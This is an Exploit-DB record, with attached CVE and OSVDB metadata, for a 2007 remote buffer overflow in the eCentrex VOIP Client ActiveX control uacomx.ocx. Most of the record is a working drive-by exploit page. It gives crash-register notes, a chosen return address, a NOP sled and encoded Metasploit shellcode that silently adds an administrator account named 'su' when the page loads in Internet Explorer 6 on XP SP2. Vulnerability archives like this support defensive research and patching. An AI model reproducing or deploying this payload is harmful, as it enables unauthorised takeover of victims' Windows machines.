{"bulletinFamily": "exploit", "id": "EDB-ID:4299", "cvelist": ["CVE-2007-4489"], "modified": "2007-08-21T00:00:00", "lastseen": "2016-01-31T20:35:37", "edition": 1, "sourceData": "<!--\r\n17/08/2007 04.41.37\r\neCentrex VOIP Client module (uacomx.ocx 2.0.1) remote buffer overflow\r\nexploit (ie6 / xp sp2)\r\n\r\npassing more than 164 chars to ReInit method in Username argument\r\nEAX 41414131\r\nECX 0013D444 ASCII \"AAAAAAAA...\r\nEDX 00000000\r\nEBX 00000000\r\nESP 0013D3A0\r\nEBP 0013D458 ASCII \"AAAAAAAA...\r\nESI 41414131\r\nEDI 00000001\r\nEIP 04C4C945 euacom.04C4C945\r\n\r\n...\r\n04C4C945 8B0E MOV ECX,DWORD PTR DS:[ESI]\r\n04C4C947 8B01 MOV EAX,DWORD PTR DS:[ECX]\r\n04C4C949 FF50 10 CALL DWORD PTR DS:[EAX+10]\r\n\r\nAccess violation when reading 41414131\r\nalso seh is overwritten\r\n\r\nobject safety report\r\nRegKey Safe for Script: False\r\nRegKey Safe for Init: False\r\nImplements IObjectSafety: True\r\nIDisp Safe: Safe for untrusted: caller,data\r\nIPStorage Safe: Safe for untrusted: caller,data\r\nKillBitSet: False\r\n\r\nthis was the codebase:\r\nhttp://202.73.10.134/e800/euacom/uacomx.cab\r\n\r\nvendor:\r\nhttp://www.e800phone.com/abtus.htm\r\n\r\nrgod.\r\nsite: http://retrogod.altervista.org\r\n-->\r\n<html>\r\n<object classid='clsid:BD80D375-5439-4D80-B128-DDA5FDC3AE6C' id='IUAComFormX' /></object>\r\n<script language='vbscript'>\r\n'metasploit one, 456 bytes - cmd /c net user su tzu /add & net localgroup Administrators su /add\r\nscode = unescape(\"%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49%37%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%44%58%50%30%41%30%41%6b%41%41%54%42%41%32%41%41%32%42%41%30%42%41%58%38%41%42%50%75%68%69%39%6c%38%68%31%54%43%30%47%70%57%70%4c%4b%30%45%77%4c%6e%6b%31%6c%47%75%51%68%43%31%48%6f%6c%4b%52%6f%75%48%4c%4b%63%6f%31%30%53%31%38%6b%71%59%6c%4b%36%54%6c%4b%47%71%48%6e%64%71%4f%30%4d%49%6c%6c%4e%64%4b%70%30%74%76%67%4a%61%39%5a%76%6d%55%51%6b%72%4a%4b%68%74%47%4b%70%54%35%74%55%54%61%65%6b%55%6c%4b%41%4f%77%54%34%41%48%6b%71%76%6e%6b%46%6c%62%6b%6e%6b%33%6f%77%6c%54%41%68%6b%6e%6b%57%6c%6c%4b%46%61%48%6b%4f%79%61%4c%71%34%56%64%48%43%54%71%4b%70%31%74%4c%4b%37%30%46%50%4f%75%4f%30%41%68%46%6c%6e%6b%43%70%46%6c%6c%4b%30%70%35%4c%6e%4d%4e%6b%50%68%35%58%68%6b%56%69%6c%4b%4b%30%6e%50%57%70%53%30%73%30%4e%6b%62%48%67%4c%43%6f%50%31%4a%56%51%70%36%36%6d%59%58%78%6d%53%49%50%33%4b%56%30%42%48%41%6e%58%58%6d%32%70%73%41%78%6f%68%69%6e%6f%7a%54%4e%42%77%49%6f%38%67%33%53%30%6d%75%34%41%30%66%4f%70%63%65%70%52%4e%43%55%31%64%31%30%74%35%33%43%63%55%51%62%31%30%51%63%41%65%47%50%32%54%30%7a%42%55%61%30%36%4f%30%61%43%54%71%74%35%70%57%56%65%70%70%6e%61%75%52%54%45%70%32%4c%70%6f%70%63%73%51%72%4c%32%47%54%32%32%4f%42%55%30%70%55%70%71%51%65%34%32%4d%62%49%50%6e%42%49%74%33%62%54%43%42%30%61%42%54%70%6f%50%72%41%63%67%50%51%63%34%35%77%50%66%4f%32%41%61%74%71%74%35%50%44\")\r\n\r\n'try this kind of command: msfpescan -d ./tools/iexplore -x \"\\x00\\x13\\x41\\x00\"\r\nesi = unescape(\"%65%1a%2f%7e\") '0x7e2f1a65 -> 0x00134200 - jumpin' in the middle of pad...\r\n\r\nl_pad = Replace( Space(2555), \" \", unescape(\"%1b%27%3f%7e\") )' 0x7e3f272b -> 0x00137000 - jumping to ultranop, worked 100%, you really need javashit spray every time?\r\n\r\nl_nop = string(12222,unescape(\"%90\"))\r\n\r\nUserName = String(164,\"A\") + esi + l_pad + l_nop + scode\r\nPassword = \"\"\r\nProxyServerIP = \"\"\r\nProxyIP = \"\"\r\nProject = \"\"\r\nPortNo = 1\r\nIUAComFormX.ReInit UserName ,Password ,ProxyServerIP ,ProxyIP ,Project ,PortNo\r\n</script>\r\n</html>\r\n\r\n# milw0rm.com [2007-08-21]\r\n", "published": "2007-08-21T00:00:00", "href": "https://www.exploit-db.com/exploits/4299/", "osvdbidlist": ["37738"], "reporter": "rgod", "hash": "86263ca2e373d1c4c6e682af3a36088b822dbc23728cfedbdaee4a65564e566b", "title": "eCentrex VOIP Client module uacomx.ocx 2.0.1 Remote BoF Exploit", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "eCentrex VOIP Client module (uacomx.ocx 2.0.1) Remote BOF Exploit. CVE-2007-4489. Remote exploit for windows platform", "references": [], "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/4299/", "enchantments": {"vulnersScore": 7.1}}

{"result": {"cve": [{"id": "CVE-2007-4489", "type": "cve", "title": "CVE-2007-4489", "description": "Buffer overflow in the IUAComFormX ActiveX control in uacomx.ocx 2.0.1 in the eCentrex VOIP Client module allows remote attackers to execute arbitrary code via a long Username argument to the ReInit method.", "published": "2007-08-22T19:17:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-4489", "cvelist": ["CVE-2007-4489"], "lastseen": "2016-09-03T09:23:48"}], "osvdb": [{"id": "OSVDB:37738", "type": "osvdb", "title": "eCentrex VOIP Client IUAComFormX ActiveX (uacomx.ocx) ReInit Method Arbitrary Code Execution", "description": "# No description provided by the source\n\n## References:\nSecurity Tracker: 1018596\n[Secunia Advisory ID:26525](https://secuniaresearch.flexerasoftware.com/advisories/26525/)\nOther Advisory URL: http://milw0rm.com/exploits/4299\nISS X-Force ID: 36129\nFrSIRT Advisory: ADV-2007-2954\n[CVE-2007-4489](https://vulners.com/cve/CVE-2007-4489)\nBugtraq ID: 25383\n", "published": "2007-08-21T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:37738", "cvelist": ["CVE-2007-4489"], "lastseen": "2017-04-28T13:20:33"}]}}